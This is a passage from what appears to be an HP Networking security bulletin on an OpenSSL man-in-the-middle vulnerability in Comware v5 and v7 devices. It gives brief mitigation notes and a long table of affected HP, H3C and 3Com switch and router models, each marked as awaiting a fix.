Following the guidelines in the Hardening Comware-based devices can help to further reduce man-in-the-middle opportunities:

http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=c03536 920

For an HP Networking device acting as an OpenSSL Server, using a patched OpenSSL client or non-OpenSSL client eliminates the risk. As an example, most modern web browsers do not use the OpenSSL client and the sessions between the HP Networking OpenSSL server and the non-OpenSSL client are not at risk for this attack. For HP Networking Equipment that is using an OpenSSL client, patching the OpenSSL server will eliminate the risk of this attack.

Protocol Notes

The following details the protocols that use OpenSSL in Comware v5 and Comware v7:

Comware V7:

Server:

FIPS/HTTPS/Load Balancing/Session Initiation Protocol

Client:

Load Balancing/OpenFlow/Session Initiation Protocol/State Machine Based Anti-Spoofing/Dynamic DNS

Comware V5:

Server:

CAPWAP/EAP/SSLVPN

Client:

Dynamic DNS

Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted 3Com Branded Products Impacted

12900 Switch Series Fix in progress use mitigations JG619A HP FF 12910 Switch AC Chassis JG621A HP FF 12910 Main Processing Unit JG632A HP FF 12916 Switch AC Chassis JG634A HP FF 12916 Main Processing Unit

12500 Fix in progress use mitigations JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JC808A HP 12500 TAA Main Processing Unit H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M)

12500 (Comware v7) Fix in progress use mitigations JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JG497A HP 12500 MPU w/Comware V7 OS JG782A HP FF 12508E AC Switch Chassis JG783A HP FF 12508E DC Switch Chassis JG784A HP FF 12518E AC Switch Chassis JG785A HP FF 12518E DC Switch Chassis JG802A HP FF 12500E MPU H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M)

11900 Switch Series Fix in progress use mitigations JG608A HP FF 11908-V Switch Chassis JG609A HP FF 11900 Main Processing Unit

10500 Switch Series (Comware v5) Fix in progress use mitigations JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC614A HP 10500 Main Processing Unit JC748A HP 10512 Switch Chassis JG375A HP 10500 TAA Main Processing Unit JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis

10500 Switch Series (Comware v7) Fix in progress use mitigations JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC748A HP 10512 Switch Chassis JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis JG496A HP 10500 Type A MPU w/Comware v7 OS

9500E Fix in progress use mitigations JC124A HP A9508 Switch Chassis JC124B HP 9505 Switch Chassis JC125A HP A9512 Switch Chassis JC125B HP 9512 Switch Chassis JC474A HP A9508-V Switch Chassis JC474B HP 9508-V Switch Chassis H3C S9505E Routing-Switch Chassis (0235A0G6) H3C S9508E-V Routing-Switch Chassis (0235A38Q) H3C S9512E Routing-Switch Chassis (0235A0G7) H3C S9508E-V Routing-Switch Chassis (0235A38Q) H3C S9505E Chassis w/ Fans (0235A38P) H3C S9512E Chassis w/ Fans (0235A38R)

Router 8800 Fix in progress use mitigations JC147A HP A8802 Router Chassis JC147B HP 8802 Router Chassis JC148A HP A8805 Router Chassis JC148B HP 8805 Router Chassis JC149A HP A8808 Router Chassis JC149B HP 8808 Router Chassis JC150A HP A8812 Router Chassis JC150B HP 8812 Router Chassis JC141A HP 8802 Main Control Unit Module JC138A HP 8805/08/12 (1E) Main Cntrl Unit Mod JC137A HP 8805/08/12 (2E) Main Cntrl Unit Mod H3C SR8805 10G Core Router Chassis (0235A0G8) H3C SR8808 10G Core Router Chassis (0235A0G9) H3C SR8812 10G Core Router Chassis (0235A0GA) H3C SR8802 10G Core Router Chassis (0235A0GC) H3C SR8802 10G Core Router Chassis (0235A31B) H3C SR8805 10G Core Router Chassis (0235A31C) H3C SR8808 10G Core Router Chassis (0235A31D) H3C SR8812 10G Core Router Chassis (0235A31E)

7500 Switch Series Fix in progress use mitigations JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T JC697A HP A7502 TAA Main Processing Unit JC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE JC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE JC700A HP A7500 384 Gbps TAA Fabric / MPU JC701A HP A7510 768 Gbps TAA Fabric / MPU JD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports JD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports JD194A HP 384 Gbps Fabric A7500 Module JD194B HP 7500 384Gbps Fabric Module JD195A HP 7500 384Gbps Advanced Fabric Module JD196A HP 7502 Fabric Module JD220A HP 7500 768Gbps Fabric Module JD238A HP A7510 Switch Chassis JD238B HP 7510 Switch Chassis JD239A HP A7506 Switch Chassis JD239B HP 7506 Switch Chassis JD240A HP A7503 Switch Chassis JD240B HP 7503 Switch Chassis JD241A HP A7506 Vertical Switch Chassis JD241B HP 7506-V Switch Chassis JD242A HP A7502 Switch Chassis JD242B HP 7502 Switch Chassis JD243A HP A7503 Switch Chassis w/1 Fabric Slot JD243B HP 7503-S Switch Chassis w/1 Fabric Slot H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4) H3C S7503E Ethernet Switch Chassis with Fan (0235A0G2) H3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5) H3C S7506E Ethernet Switch Chassis with Fan (0235A0G1) H3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3) H3C S7510E Ethernet Switch Chassis with Fan (0235A0G0) H3C S7502E Chassis w/ fans (0235A29A) H3C S7503E Chassis w/ fans (0235A27R) H3C S7503E-S Chassis w/ fans (0235A33R) H3C S7506E Chassis w/ fans (0235A27Q) H3C S7506E-V Chassis w/ fans (0235A27S)

HSR6800 Fix in progress use mitigations JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU

HSR6800 Russian Version Fix in progress use mitigations JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU

HSR6602 Fix in progress use mitigations JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router

HSR6602 Russian Version Fix in progress use mitigations JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router

A6600 Fix in progress use mitigations JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)

A6600 Russian Version Fix in progress use mitigations JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)

6600 MCP Fix in progress use mitigations JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)

6600 MCP Russian Version Fix in progress use mitigations JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG778A HP 6600 MCP-X2 Router TAA MPU JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)

5920 Switch Series Fix in progress use mitigations JG296A HP 5920AF-24XG Switch JG555A HP 5920AF-24XG TAA Switch

5900 Switch Series Fix in progress use mitigations JC772A HP 5900AF-48XG-4QSFP+ Switch JG336A HP 5900AF-48XGT-4QSFP+ Switch JG510A HP 5900AF-48G-4XG-2QSFP+ Switch JG554A HP 5900AF-48XG-4QSFP+ TAA Switch JG838A HP FF 5900CP-48XG-4QSFP+ Switch

5900 Virtual Switch Fix in progress use mitigations JG814AAE HP Virtual Switch 5900v VMware E-LTU JG815AAE HP VSO SW for 5900v VMware E-LTU

5830 Switch Series Fix in progress use mitigations JC691A HP A5830AF-48G Switch w/1 Interface Slot JC694A HP A5830AF-96G Switch JG316A HP 5830AF-48G TAA Switch w/1 Intf Slot JG374A HP 5830AF-96G TAA Switch

5820 Switch Series Fix in progress use mitigations JC102A HP 5820-24XG-SFP+ Switch JC106A HP 5820-14XG-SFP+ Switch with 2 Slots JG219A HP 5820AF-24XG Switch JG243A HP 5820-24XG-SFP+ TAA-compliant Switch JG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media modules Plus OSM (0235A37L) H3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T (RJ45) (0235A370)

5800 Switch Series Fix in progress use mitigations JC099A HP 5800-24G-PoE Switch JC100A HP 5800-24G Switch JC101A HP 5800-48G Switch with 2 Slots JC103A HP 5800-24G-SFP Switch JC104A HP 5800-48G-PoE Switch JC105A HP 5800-48G Switch JG225A HP 5800AF-48G Switch JG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots JG254A HP 5800-24G-PoE+ TAA-compliant Switch JG255A HP 5800-24G TAA-compliant Switch JG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt JG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot JG258A HP 5800-48G TAA Switch w 1 Intf Slot H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot (0235A36U) H3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X (SFP Plus ) Plus 1 media module PoE (0235A36S) H3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus media module (no power) (0235A374) H3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus ) Plus media module (0235A379) H3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module (0235A378) H3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM (0235A36W)

5500 HI Switch Series Fix in progress use mitigations JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch JG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch JG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt JG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt JG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt JG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt JG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt JG681A HP 5500-24G-SFP HI TAA Swch w/2Slt

5500 EI Switch Series Fix in progress use mitigations JD373A HP 5500-24G DC EI Switch JD374A HP 5500-24G-SFP EI Switch JD375A HP 5500-48G EI Switch JD376A HP 5500-48G-PoE EI Switch JD377A HP 5500-24G EI Switch JD378A HP 5500-24G-PoE EI Switch JD379A HP 5500-24G-SFP DC EI Switch JG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts JG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts JG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts JG250A HP 5500-24G EI TAA Switch w 2 Intf Slts JG251A HP 5500-48G EI TAA Switch w 2 Intf Slts JG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts JG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts H3C S5500-28C-EI Ethernet Switch (0235A253) H3C S5500-28F-EI Eth Switch AC Single (0235A24U) H3C S5500-52C-EI Ethernet Switch (0235A24X) H3C S5500-28C-EI-DC Ethernet Switch (0235A24S) H3C S5500-28C-PWR-EI Ethernet Switch (0235A255) H3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259) H3C S5500-52C-PWR-EI Ethernet Switch (0235A251)

5500 SI Switch Series Fix in progress use mitigations JD369A HP 5500-24G SI Switch JD370A HP 5500-48G SI Switch JD371A HP 5500-24G-PoE SI Switch JD372A HP 5500-48G-PoE SI Switch JG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts JG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts H3C S5500-28C-SI Ethernet Switch (0235A04U) H3C S5500-52C-SI Ethernet Switch (0235A04V) H3C S5500-28C-PWR-SI Ethernet Switch (0235A05H) H3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)

5120 EI Switch Series Fix in progress use mitigations JE066A HP 5120-24G EI Switch JE067A HP 5120-48G EI Switch JE068A HP 5120-24G EI Switch with 2 Slots JE069A HP 5120-48G EI Switch with 2 Slots JE070A HP 5120-24G-PoE EI Switch with 2 Slots JE071A HP 5120-48G-PoE EI Switch with 2 Slots JG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts JG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts JG245A HP 5120-24G EI TAA Switch w 2 Intf Slts JG246A HP 5120-48G EI TAA Switch w 2 Intf Slts JG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts JG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ) H3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS) H3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR) H3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT) H3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU) H3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)

5120 SI switch Series Fix in progress use mitigations JE072A HP 5120-48G SI Switch JE073A HP 5120-16G SI Switch JE074A HP 5120-24G SI Switch JG091A HP 5120-24G-PoE+ (370W) SI Switch JG092A HP 5120-24G-PoE+ (170W) SI Switch H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W) H3C S5120-20P-SI L2 16GE Plus 4SFP (0235A42B) H3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D) H3C S5120-28P-HPWR-SI (0235A0E5) H3C S5120-28P-PWR-SI (0235A0E3)

4800 G Switch Series Fix in progress use mitigations JD007A HP 4800-24G Switch JD008A HP 4800-24G-PoE Switch JD009A HP 4800-24G-SFP Switch JD010A HP 4800-48G Switch JD011A HP 4800-48G-PoE Switch

3Com Switch 4800G 24-Port (3CRS48G-24-91) 3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91) 3Com Switch 4800G 48-Port (3CRS48G-48-91) 3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91) 3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91)

4510G Switch Series Fix in progress use mitigations JF428A HP 4510-48G Switch JF847A HP 4510-24G Switch

3Com Switch 4510G 48 Port (3CRS45G-48-91) 3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91) 3Com Switch E4510-24G (3CRS45G-24-91)

4210G Switch Series Fix in progress use mitigations JF844A HP 4210-24G Switch JF845A HP 4210-48G Switch JF846A HP 4210-24G-PoE Switch

3Com Switch 4210-24G (3CRS42G-24-91) 3Com Switch 4210-48G (3CRS42G-48-91) 3Com Switch E4210-24G-PoE (3CRS42G-24P-91)

3610 Switch Series Fix in progress use mitigations JD335A HP 3610-48 Switch JD336A HP 3610-24-4G-SFP Switch JD337A HP 3610-24-2G-2G-SFP Switch JD338A HP 3610-24-SFP Switch H3C S3610-52P - model LS-3610-52P-OVS (0235A22C) H3C S3610-28P - model LS-3610-28P-OVS (0235A22D) H3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E) H3C S3610-28F - model LS-3610-28F-OVS (0235A22F)

3600 V2 Switch Series Fix in progress use mitigations JG299A HP 3600-24 v2 EI Switch JG300A HP 3600-48 v2 EI Switch JG301A HP 3600-24-PoE+ v2 EI Switch JG301B HP 3600-24-PoE+ v2 EI Switch JG302A HP 3600-48-PoE+ v2 EI Switch JG302B HP 3600-48-PoE+ v2 EI Switch JG303A HP 3600-24-SFP v2 EI Switch JG304A HP 3600-24 v2 SI Switch JG305A HP 3600-48 v2 SI Switch JG306A HP 3600-24-PoE+ v2 SI Switch JG306B HP 3600-24-PoE+ v2 SI Switch JG307A HP 3600-48-PoE+ v2 SI Switch JG307B HP 3600-48-PoE+ v2 SI Switch

3100V2 Fix in progress use mitigations JD313B HP 3100-24-PoE v2 EI Switch JD318B HP 3100-8 v2 EI Switch JD319B HP 3100-16 v2 EI Switch JD320B HP 3100-24 v2 EI Switch JG221A HP 3100-8 v2 SI Switch JG222A HP 3100-16 v2 SI Switch JG223A HP 3100-24 v2 SI Switch

3100V2-48 Fix in progress use mitigations JG315A HP 3100-48 v2 Switch

1910 Fix in progress use mitigations JE005A HP 1910-16G Switch JE006A HP 1910-24G Switch JE007A HP 1910-24G-PoE (365W) Switch JE008A HP 1910-24G-PoE(170W) Switch JE009A HP 1910-48G Switch JG348A HP 1910-8G Switch JG349A HP 1910-8G-PoE+ (65W) Switch JG350A HP 1910-8G-PoE+ (180W) Switch 3Com Baseline Plus Switch 2900 Gigabit Family - 52 port (3CRBSG5293) 3Com Baseline Plus Switch 2900G - 20 port (3CRBSG2093) 3Com Baseline Plus Switch 2900G - 28 port (3CRBSG2893) 3Com Baseline Plus Switch 2900G - 28HPWR (3CRBSG28HPWR93) 3Com Baseline Plus Switch 2900G - 28PWR (3CRBSG28PWR93)

1810v1 P2 Fix in progress use mitigations J9449A HP 1810-8G Switch J9450A HP 1810-24G Switch

1810v1 PK Fix in progress use mitigations J9660A HP 1810-48G Switch

MSR20 Fix in progress use mitigations JD432A HP A-MSR20-21 Multi-Service Router JD662A HP MSR20-20 Multi-Service Router JD663A HP MSR20-21 Multi-Service Router JD663B HP MSR20-21 Router JD664A HP MSR20-40 Multi-Service Router JF228A HP MSR20-40 Router JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324) H3C RT-MSR2040-AC-OVS-H3 (0235A326) H3C MSR 20-20 (0235A19H) H3C MSR 20-21 (0235A325) H3C MSR 20-40 (0235A19K) H3C MSR-20-21 Router (0235A19J)

MSR20-1X Fix in progress use mitigations JD431A HP MSR20-10 Router JD667A HP MSR20-15 IW Multi-Service Router JD668A HP MSR20-13 Multi-Service Router JD669A HP MSR20-13 W Multi-Service Router JD670A HP MSR20-15 A Multi-Service Router JD671A HP MSR20-15 AW Multi-Service Router JD672A HP MSR20-15 I Multi-Service Router JD673A HP MSR20-11 Multi-Service Router JD674A HP MSR20-12 Multi-Service Router JD675A HP MSR20-12 W Multi-Service Router JD676A HP MSR20-12 T1 Multi-Service Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router JG209A HP MSR20-12-T-W Router (NA) JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8) H3C MSR 20-10 (0235A0A7) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-11 (0235A31V) H3C MSR 20-12 (0235A32E) H3C MSR 20-12 T1 (0235A32B) H3C MSR 20-13 (0235A31W) H3C MSR 20-13 W (0235A31X) H3C MSR 20-15 A (0235A31Q) H3C MSR 20-15 A W (0235A31R) H3C MSR 20-15 I (0235A31N) H3C MSR 20-15 IW (0235A31P) H3C MSR20-12 W (0235A32G)

MSR30 Fix in progress use mitigations JD654A HP MSR30-60 POE Multi-Service Router JD657A HP MSR30-40 Multi-Service Router JD658A HP MSR30-60 Multi-Service Router JD660A HP MSR30-20 POE Multi-Service Router JD661A HP MSR30-40 POE Multi-Service Router JD666A HP MSR30-20 Multi-Service Router JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF232A HP RT-MSR3040-AC-OVS-AS-H3 JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S) H3C MSR 30-20 (0235A19L) H3C MSR 30-20 POE (0235A239) H3C MSR 30-40 (0235A20J) H3C MSR 30-40 POE (0235A25R) H3C MSR 30-60 (0235A20K) H3C MSR 30-60 POE (0235A25S) H3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)

MSR30-16 Fix in progress use mitigations JD659A HP MSR30-16 POE Multi-Service Router JD665A HP MSR30-16 Multi-Service Router JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321) H3C MSR 30-16 (0235A237) H3C MSR 30-16 POE (0235A238)

MSR30-1X Fix in progress use mitigations JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H) H3C RT-MSR3011-AC-OVS-H3 (0235A29L)

MSR50 Fix in progress use mitigations JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR5040-DC-OVS-H3C (0235A20P) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L)

MSR50-G2 Fix in progress use mitigations JD429A HP MSR50 G2 Processor Module JD429B HP MSR50 G2 Processor Module H3C H3C MSR 50 Processor Module-G2 (0231A84Q) H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD(0231A0KL)

MSR20 Russian version Fix in progress use mitigations JD663B HP MSR20-21 Router JF228A HP MSR20-40 Router JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324) H3C RT-MSR2040-AC-OVS-H3 (0235A326)

MSR20-1X Russian version Fix in progress use mitigations JD431A HP MSR20-10 Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router H3C MSR 20-10 (0235A0A7) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)

MSR30 Russian version Fix in progress use mitigations JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)

MSR30-1X Russian version Fix in progress use mitigations JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C RT-MSR3011-AC-OVS-H3 (0235A29L) H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)

MSR30-16 Russian version Fix in progress use mitigations JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)

MSR50 Russian version Fix in progress use mitigations JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR 50 Processor Module (0231A791) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR5040-DC-OVS-H3C (0235A20P)

MSR50 G2 Russian version Fix in progress use mitigations JD429B HP MSR50 G2 Processor Module H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL)

MSR9XX Fix in progress use mitigations JF812A HP MSR900 Router JF813A HP MSR920 Router JF814A HP MSR900-W Router JF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr JG207A HP MSR900-W Router (NA) JG208A HP MSR920-W Router (NA) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2) H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX) H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4) H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)

